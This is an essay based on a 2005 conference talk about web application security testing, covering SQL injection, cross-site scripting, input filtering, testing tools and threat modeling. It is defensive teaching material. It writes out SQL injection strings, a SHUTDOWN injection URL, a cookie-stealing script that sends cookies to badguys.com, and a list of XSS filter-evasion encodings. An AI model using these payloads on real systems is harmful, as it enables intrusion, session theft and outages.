Web Application Security Testing

This is based on a presentation that I gave at the Minnesota State Colleges and Universities IT Conference in April 2005. I started expanding on my notes but never finished, so it is obviously incomplete toward the end. Also, because it holds fairly close to what I said during that talk and I had a lot to cover in an hour, there's a lot of detail missing. At least I've got handouts. Contact me at sam [at] afongen <dot> com if you have questions.

So you want to test the security of a web application. Let's jump right in and start with penetration tests on a running app, knocking on the front door to see what breaks.

First things first: CYA

Well okay, hold your horses. Before you run anything that smacks of pen-testing, you should do one thing first: cover your ass and get written permission. Seriously. Legalities aside, the techniques and tools covered here have the potential to bring down a server hard. I don't know about you, but I don't like to piss people off and make a lot of extra work unless it's really worth it.

Do yourself a favor and make sure that the right people know what you're doing and that you may inadvertently bring down a production server or leak private data. For that matter, do yourself an even bigger favor and make sure you have a decent testing environment so you don't have to be running tests on a production server in the first place.

SQL Injection

We'll begin with a common vulnerability, SQL injection: modifying an application's input to trick it into running SQL that its developers never intended.

Let's say you have a login form like this:

<form action="/login" method="post">
<p><label>Username <input name="uname" type="text" /></label></p>
<p><label>Password <input name="upass" type="password" /></label></p>
<p><input type="submit" value="Login" /></p>
</form>

Once submitted, the application processes the form input to run a query:

SELECT id
FROM users
WHERE uname='$uname'
AND pw=MD5('$upass')
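
In PHP, for instance, naive code might build that query with simple string interpolation. The sketch below is hypothetical -- your language and API will differ -- but the pattern is depressingly common:

<?php
// Assumes a database connection is already open.
// The form values are dropped straight into the SQL string,
// so whatever the user typed becomes part of the query.
$uname = $_POST['uname'];
$upass = $_POST['upass'];

$sql = "SELECT id FROM users
        WHERE uname='$uname'
        AND pw=MD5('$upass')";
$result = mysql_query($sql);
?>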

(Note that we're not storing the password as cleartext; we're storing an MD5 hash instead, which helps keep passwords from being inadvertently leaked.) In a happy-day scenario, a legitimate user enters valid credentials:

Username: sam
Password: J0yful,frum1ous Bandersnatch!

Taken blindly, the web app uses this input to generate the following SQL:

SELECT id
FROM users
WHERE uname='sam'
AND pw=MD5('J0yful,frum1ous Bandersnatch!')

So far so good. But what if a malicious user entered this for the username (the password doesn't matter, as we'll see): ' OR 1=1; --

SELECT id
FROM users
WHERE uname='' OR 1=1;--'
AND pw=MD5('J0yful,frum1ous Bandersnatch!')

Since '--' signifies the start of a comment, this is effectively what's being run:

SELECT id
FROM users
WHERE uname='' OR 1=1;

Because 1=1 is always true (you mathematicians in back keep quiet), this query returns all ids.

What happens now could be interesting. Is your app written to handle the possibility of more than one id being returned? Does it log the user in with the first id returned? In that case, a simple SQL injection is enough for an attacker to gain access to your application posing as a legitimate user. Or does it display an error to the user (and therefore the attacker) describing the unexpected result? Or does the app blow up in exciting and unusual ways? Do you know? You should.

Let's take a look at another SQL injection attempt on the same form. This time the attacker enters ';SHUTDOWN;-- as the username and leaves the password blank.

If left unchecked, this creates an interesting query:

SELECT id
FROM users
WHERE uname='';SHUTDOWN;--'
AND pw=MD5('')

If the SHUTDOWN is executed, the results of the first query hardly matter. And if the web application is connecting to the database server with sufficient privileges, it can be executed. It's been known to happen, in fact, just by using a URL like this:

http://example.com/view.asp?id=3;SHUTDOWN;--

Let's look at one more example, a slightly more involved one, to show how an attacker can use SQL injection to map your database structure. Using the same technique as above, entering ' HAVING 1=1;-- as the username manipulates the SQL to look like this:

SELECT id
FROM users
WHERE uname='' HAVING 1=1;--'
AND pw=MD5('')

Some database servers don't much care for this, and complain loudly. Unless the web application is prepared to handle the error, the user might just end up seeing something like this:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

Now we know a few key tidbits that might help refine the attack.

  1. This app is using SQL Server. We don't know what version yet, but some more probing can tell us that.
  2. We know a table name and have begun to identify columns in that table. By continuing along the same lines, we can map out the rest of the table. Armed with this knowledge, we're better prepared to alter or read the table's contents.

Lessons

This is just the tip of the iceberg of SQL injection attacks, but already we've learned a few things to keep in mind while developing web applications.

  1. Attackers do unexpected things. You probably have an idealized flow in mind for your application, and expectations for what a user will do. To adequately test your application for security, you'll need to break out of that thinking.
  2. It's important that your code be written to handle unexpected situations. Under no circumstances should it display detailed error messages to end users. No database or application errors, no stack dumps, no messages like "'snowball' is not the correct password for username 'Sam'." Display nothing that tells an attacker any more information than "that didn't work." (A configuration sketch follows this list.)
  3. The overarching lesson -- a very, very important one -- is that you should never accept input blindly. Input from outside your application is tainted until proven otherwise.
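
On the error-message point: most platforms let you suppress detailed errors in production and log them instead. In PHP, for example, a minimal php.ini sketch would look like this (the log path is just an example):

; Never show raw errors to the browser on a production server.
display_errors = Off
; Do record them somewhere developers can read them.
log_errors = On
error_log = /var/log/php_errors.log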

Of course, SQL-savvy programs like database servers are not the only ones vulnerable to command injection. We've got LDAP injection, shell command injection, SOAP injection… Input validation is essential to protecting against all of them.

Filter input, escape output.

When talking about input validation, I like to borrow a phrase from Chris Shiflett, who concisely summarizes a critical technique for improving web application security: filter input, escape output.

Input includes everything in an HTTP request: GET, POST, cookies, HTTP headers … everything. Input may also include what you pull from a database or receive from an external SOAP service. If it's crossing a trust boundary -- if it does not originate within your application code -- you need to filter it, validating it against expected patterns.

Wait. Back up a minute. Trust boundary?

A key concept in handling data as it passes through your application is boundary filtering: filtering data as it passes between boundaries in a system. For example, there's a boundary between your application and the other systems it uses: a database server, a command shell, a mail transfer agent, a SOAP server. Different layers in your application may have boundaries between them, especially if they're distributed across servers. There's obviously a trust boundary between your application and its users. Anywhere you might have reason to distrust data as it comes into your app, you have a trust boundary, and you need to filter the data.

When validating input, please don't try to predict bad input to filter out (a blacklist). You are guaranteed to miss something, trust me. It's far safer to check input against a list of expected patterns, i.e. a whitelist. In the SQL injection example above, we know what usernames look like: in this case, up to eight alphanumeric characters. A quick check tells us that ' OR 1=1;-- somehow just isn't right. You should be able to match every bit of input to your application against an expected pattern. If it doesn't look right, reject it. That's why we have regular expressions.
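
A minimal sketch of that kind of whitelist check in PHP (the one-to-eight alphanumeric rule is just this example's policy):

<?php
// Whitelist: accept only 1-8 alphanumeric characters.
// Anything else is rejected outright.
function valid_username($uname) {
    return preg_match('/^[A-Za-z0-9]{1,8}$/', $uname) === 1;
}

if (!valid_username($_POST['uname'])) {
    // Tell the user nothing more than "that didn't work."
    exit('Login failed.');
}
?>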

There's another side to boundary filtering, and we've already hinted at it: escaping output. Let's demonstrate with a different sort of vulnerability.

Cross-Site Scripting

If you follow the Bugtraq mailing list for very long, you'll notice a lot of cross-site scripting (XSS) attacks. XSS can vary a lot and be subtle and difficult to prevent, but the classic case is straightforward. An attacker posts a message that includes JavaScript:

<script>document.location='http://badguys.com/?c=' + document.cookie</script>

The next time someone visits the page with that script embedded, they'll be redirected to badguys.com, their cookie(s) stolen, and possibly returned to the original page none the wiser. It's called cross-site scripting because of this interaction between the attacker's web site and yours, via the victim.

Input validation is an important step in preventing XSS, but it's not foolproof. It is also important to HTML-encode output. Anything from outside your application code must be escaped. Period. Characters that are meaningful in markup (at the very least < > & ' ") need to be translated to their equivalent HTML entities (e.g. & becomes &amp;).
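
In PHP, for instance, htmlspecialchars() handles exactly those translations; pass ENT_QUOTES so single quotes are covered too. A minimal sketch, where $message stands in for any data from outside:

<?php
// Escape at output time, every time. ENT_QUOTES encodes
// both single and double quotes along with < > &.
$safe = htmlspecialchars($message, ENT_QUOTES);
echo "<p>$safe</p>";
?>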

Testing for XSS is easy: just enter HTML:

<script>alert('XSS')</script>

and see if it's been escaped in a page that uses that input:

&lt;script&gt;alert('XSS')&lt;/script&gt;

Of course, I lied. It's not that easy. Take a quick glance at this page cataloguing filter evasion techniques and you'll see what I mean. For example, here are different ways to encode the character <:

<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;

&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C

A bit overwhelming, and I'm sure you'll see how easy it is to miss something.

As I wrote at the outset, XSS can vary dramatically and be quite subtle, which I hope you can now see. It is a serious and common vulnerability, though, so it must be tested for.

More on SQL Injection

We talked about the importance of input validation for protecting against SQL injection, but honestly that will only get you so far. Escaping output means more than just HTML-encoding: we should escape any characters that have meaning to the external system we're passing data to. This is what is meant by boundary filtering: filter data as it passes in through a trust boundary, and escape data as it passes out through another.

For example, in many database servers ' and " are metacharacters and should be escaped. That's how we deal with names like O'Reilly. If we had properly escaped the input to our login screen above, malicious input like ' OR 1=1; -- would have very different results:

SELECT id
FROM users
WHERE uname='\' OR 1=1;--'
AND pw=MD5('')

Many frameworks and APIs offer functions that handle the escaping for you, so you don't even need to think about it. PHP's mysql_escape_string(), for example -- or better yet, mysql_real_escape_string(), which takes into account the character set of the connection.
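
A sketch of our login code using it (again assuming the old mysql extension and an open connection):

<?php
// Escape SQL metacharacters in the input before it
// is interpolated into the query string.
$uname = mysql_real_escape_string($_POST['uname']);
$upass = mysql_real_escape_string($_POST['upass']);

$sql = "SELECT id FROM users
        WHERE uname='$uname'
        AND pw=MD5('$upass')";
$result = mysql_query($sql);
?>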

[insert some more test ranting here]

Tools & Automation

If you're as lazy as I am, right about now you're thinking that this testing is the sort of thing you'll want to automate.

Damn straight.

Before we leap right into the world of automation, though, let's take a quick tour of other tools that can help you manually test input validation.

Manual Form Submission

The first is what we've already been doing: futz with form submission, entering different values in form fields and repeatedly submitting the form. That works well for text fields, but what about checkboxes, radio buttons, hidden fields, and the like? You could use the Mozilla DOM Inspector to alter the form and its contents, but it's usually easier just to save the HTML page to your own hard drive and edit it there. There's nothing to prevent you from submitting the form from a page on your desktop instead of a page that came directly from a web server.
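
For example, save the login page locally and point the form's action at the live server with an absolute URL. From there you can edit anything you like -- say, a hidden field (a hypothetical one here) that the developer assumed was safe from tampering:

<form action="http://example.com/login" method="post">
<p><label>Username <input name="uname" type="text" /></label></p>
<p><label>Password <input name="upass" type="password" /></label></p>
<input name="maxattempts" type="hidden" value="9999" />
<p><input type="submit" value="Login" /></p>
</form>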

I am frequently surprised by how unexpected this simple technique is for developers. Many have absolutely no idea that it works until I show it to them. But it's true, and it works because of the nature of HTTP.

Learn HTTP

May I just say right now that if you are a web developer, and you're at all concerned about writing secure web applications, it is essential that you understand at least the basics of HTTP. There are plenty of online resources, but if you prefer dead trees I recommend Chris Shiflett's HTTP Developer's Handbook, an introductory and thorough overview of HTTP. Get to know the common "verbs" like GET and POST and how and why they are used. Understand headers like Host, Referer, User-Agent, Cookie, Set-Cookie, and Cache-Control. It is critical that at the very least you understand the mechanics of an HTTP transaction.
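
As a taste, here's roughly what a simple transaction looks like on the wire -- a trimmed sketch with made-up values, but the shape is right:

GET /index.html HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Referer: http://example.com/links.html

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessid=abc123

<html>...</html>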

One of the most important things to know, and one of the most surprising and least understood among new web developers, is that HTTP is stateless.

Got that? No?

No. I didn't get it the first few times I heard it, either.

"HTTP is stateless" is just a boring way of saying that a web server doesn't remember jack. An HTTP request comes in, the server handles it, the connection is closed and that's it. The next request to come in could come from the same client or could be someone on the other side of the globe. Doesn't matter. The server doesn't care. There is no built-in sense of "oh yeah, I know who this guy is, and this is what's going on during his session." That's up to your application. As far as the web server is concerned, every request is brand-new. That is the beauty and the pain of HTTP.

It's kinda like Dory from the movie Finding Nemo. Dory, you'll recall, has a memory problem: she doesn't often remember something that just happened. Like a web server. Next time you hear "HTTP is stateless," just think of that adorable blue fish.

Back to submitting forms from a desktop. Now you understand why this works: when a web server gets a form submission, it has no way of knowing whether the form is being submitted off a file on your desktop or one that was just sent from the server. It doesn't even care, remember?

"But wait!" you're thinking, "what about the Referer header?" (Ah good, you have been reading up on HTTP.) Application code can test for the Referer header, which a user agent (browser) might send to indicate which page referred it to make this request. The problem is that Referer is easy to fake, is inconsistently sent, and is not to be relied upon: remember, never trust user input. That includes HTTP headers. Yep, they can be altered and faked.

That sounds like a good enough segue to the first tool to help you probe and assess web app security. I'm just going to quickly identify tools here; in the weeks to come I'll write more about how to use them.

LiveHTTPHeaders

LiveHTTPHeaders is a Mozilla extension for monitoring and manipulating HTTP transactions. Fire it up, start browsing, and it will capture every HTTP header as it whizzes past. It's a good way to learn about HTTP.

[IMAGE]

I use LiveHTTPHeaders every day to review, replay, and modify HTTP transactions. I use it to modify form submissions on the fly, and for manipulating and monitoring cookies. You learn such interesting things looking at cookies. I once reviewed an app delivered by a consultant and within seconds found an admin=false cookie set in the login process. Sure enough, setting the cookie to admin=true was all I needed to gain full administrative access. Honest to god, 30 seconds with LiveHTTPHeaders and I'd found my first serious security bug.

Note: include security requirements when hiring consultants to write code. It is not safe to assume that they know more about secure coding practices than you do, and unless you identify security as a requirement, there's no reason to expect it to be treated as one.

Fiddler

When I first saw Fiddler, I thought it was just LiveHTTPHeaders for Internet Explorer. It does offer a similar ability to view and modify HTTP, but it has a much more detailed view, can do more, and is extensible and programmable. Very nice indeed.

Fiddler integrates seamlessly with IE but can also be set up as an HTTP proxy and run with other clients and browsers. I use it for all the same reasons I use LiveHTTPHeaders, plus some. It's especially useful for debugging differences between browsers. If you've got a Windows box, you should be using Fiddler.

WebScarab

Another tool for manually testing a site is WebScarab from OWASP, a cross-platform desktop HTTP proxy. WebScarab is extensible and can, for example, be programmed to check for XSS vulnerabilities. Interestingly, WebScarab also offers the ability to analyze session IDs to discover patterns. If a pattern can be discovered in users' session IDs, then those IDs can be predicted and the sessions hijacked.

The tools I've mentioned so far are good for manual tests. It's important to be able to test manually, if nothing else so you can learn, but there are so many different things to test for (remember the encodings for '<'?) that it would be impossible to test thoroughly by hand. Your kit needs to include tools for automation.

Nikto

Nikto is a Perl script that runs a few thousand tests against a server. It's a good start, and it points you in directions for further work.
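
Running it is simple. An invocation looks something like this (options vary by version, so check the documentation):

perl nikto.pl -h www.example.com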

Nessus

Nessus is a solid network vulnerability scanner. (demo)

Again, get permission!

After Pen-Testing

Let's say your pen-testing reveals serious, widespread design flaws. It happens -- maybe not to you, but trust me. Maybe broken access control is replicated throughout your code, or everywhere you access a database you're vulnerable to SQL injection. Now you've got a ton of code all over the place that needs updating, and a significant investment of time and resources to fix it. By this point you're thinking, "Why couldn't I have seen this earlier?"

You can, of course.

SDLC

I take the position that testing isn't just what you do once you've deployed code. Test throughout the development process.

I take this approach because we produce secure software by incorporating security throughout the SDLC -- by having a process to design, write, test, and document secure systems, and by building time into the schedule for security review, training, and tools. Simply designing, writing, testing, and documenting a project and then looking for security bugs at the end doesn't create secure software.

This also lets us leverage processes already in place. And if you don't have an SDLC, thinking about it with security in mind should encourage you to develop one -- which will result in better software all around.

Start Early. Before Development Begins.

It is to your advantage to consider security as early in the development process as possible, as detecting and addressing bugs early is easier, faster, and cheaper. Before you even begin to think about writing code, you can test to ensure that you're on the right track:

Definition and Design

Security Requirements. Are there any? Until very recently, I had never worked on a project with explicitly defined security requirements. Heck, we're not always fortunate enough to have requirements before we start -- I've certainly had my share of these projects! Here's a situation where considering security early may help bolster your SDLC.

I am not a proponent of hugely detailed requirements documentation. I value documentation, but I value working software more. To that end, I am a fan of just enough documentation to help get the job done. Fit the docs to your project.

Misuse Cases.

On my team, we use use cases to help elucidate requirements. We tend to work on large projects that merit this approach. Use cases are a user-friendly, low-fuss way to identify what an app should do.

[ insert diagram ]

Use cases talk about what a system should do. Misuse cases identify what a system should not do.

For instance, the use case "user logs in with username and password" suggests misuse cases like "attacker submits SQL injection in the username field" or "attacker brute-forces a weak password."

By considering misuse cases, we expand our use case model and get a better design to boot.

Misuse cases also help us build up test cases for use later, in code review and penetration testing.

Early design consideration also helps identify inconsistencies and repetition. Multiple authentication schemes? Repeated code? Consolidate! Validation logic scattered everywhere? Consolidate it into a validation framework!

Threat Models.

If I thought I could get away with turning this into an hour-long talk about threat modeling, I would. It's really cool. Entire chapters of the excellent Threats and Countermeasures and of the phenomenal book Writing Secure Code are dedicated to threat modeling. Why? Threat models are an effective, systematic technique for identifying threats to a system.

And you cannot write secure software until you understand the threats against it. Period.

A threat model process looks something like this:

  1. Identify assets
  2. Create an architecture overview
  3. Decompose the application
  4. Identify threats
  5. Document threats
  6. Rate threats

Depending on how much time I have here, I might get into more detail on this. More likely, though, I'll focus on STRIDE.

STRIDE -- Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege, a mnemonic for categorizing threats -- is one of those things I thought was ridiculously hokey when I first encountered it, but I've come to think it's a good approach.

This is where you need to have a handle on at least the OWASP Top Ten. Once you've mastered that, move on to the OWASP Guide and Microsoft's Threats and Countermeasures, both of which discuss common vulnerabilities in detail. You cannot protect effectively against threats you don't know about or understand. And we tend to find the bugs we know how to look for -- it is to your advantage, therefore, to know about as many as you can.

You may find it helpful to develop attack trees, methodically identifying the steps an attacker must take to succeed.

[DIAGRAM]
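
In outline form, an attack tree for our login example might start like this (an illustrative sketch):

Goal: authenticate as another user
  1. Obtain valid credentials
     1.1 Guess or brute-force a weak password
     1.2 Trick the user into revealing the password
  2. Bypass authentication entirely
     2.1 SQL injection in the login form
     2.2 Predict or steal a session ID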

I also sometimes like to work with attack patterns, which describe techniques used in an attack.

[ example ]

Both have their merits; both also carry the risk of carrying you too far into documentation and analysis paralysis -- where analysis ends only when the project is cancelled, without a line of code ever being produced. :) Both can be reused, though, so over time you'll build up a collection.

The idea is to document threats so that you can prepare countermeasures. When coding, then, you can take these documented threats and employ countermeasures -- and the threat docs feed directly into later stages of testing.

The other acronym in threat modeling is DREAD: Damage potential, Reproducibility, Exploitability, Affected users, and Discoverability. I still think it is hokey, but it is a good way to help rate threats. Because face it: there's no such thing as perfect security. There will be vulnerabilities in your software. It is important to know about them -- and to document that you know -- but if one poses very low risk, it might not be worth your time to fix. No sense spending a dollar to save a dime.

It's important to note that risk assessments change over time and differ from app to app.

This is also an opportunity to set up for defense in depth: multiple layers of defense so that there is no single catastrophic point of failure.

DURING DEVELOPMENT

Here's the fun bit: coding.

There are a number of things you can do during development. Obviously, if you've been creating misuse cases and threat models, keeping those on hand and taking specific steps to address threats is a Good Idea.

Code reviews are great. We do weekly code reviews on our team, grabbing another developer or two to look over what we've done. It's had a positive effect on our code quality.

With security in mind, use checklists:

* from your security & business requirements

* OWASP Top Ten & Guide

* language/platform-specific guides (PHP Security Consortium, J2EE, .NET)

This might seem time-consuming, and if you're on a small team it may be difficult, but do it if you can. Some bugs are also faster to find in a code review than in pen-testing: a single flawed routine might surface as 50 SQL injection bugs when you probe the running app, but it appears in the code only once.

There are also tools to automate static code checking. Most are for C, C++, C#, or Java, but there are some out there for PHP and the like as well. If you are a .NET developer, you should be using FxCop. I'm not, so I can't speak to it personally, but People In The Know swear by it, so...

Again, one of the most effective things you can do to improve the security of your code is not to trust input.

Filter input.

Escape output.

Follow Bugtraq for a while and you'll see why.

DEPLOYMENT

This is probably what you thought you'd be getting when you sat down in this room: testing an actual running application for security holes -- and hoping you don't find them.

But I hope you understand by now that there's a lot you can do before you reach this stage to help improve the security of your code. This is important because fixing a bug now -- security-related or otherwise -- is harder, more error-prone, and slower than fixing it earlier. On the other hand, I'm also a strong believer in iterative development, and I understand that you'll be going back and forth between coding and design a lot.

It's also important to know that pen-testing -- trying to break an app -- will not find certain classes of bugs. And just because you couldn't find a problem doesn't mean it isn't there.

"If you fail a penetration test you know you have a very bad problem indeed. If you pass a penetration test you do not know that you don't have a very bad problem."

That said, pen-testing is still a valuable tool as part of the process. It is worth doing manually -- poking, prodding, testing the boundaries of a system -- if nothing else because it will expand your understanding of the sorts of vulnerabilities out there. Again, checklists are useful. But keep them current.

[ demo SQL injection or XSS ]

MAINTENANCE

Logging. Log relevant things.

Incident Response.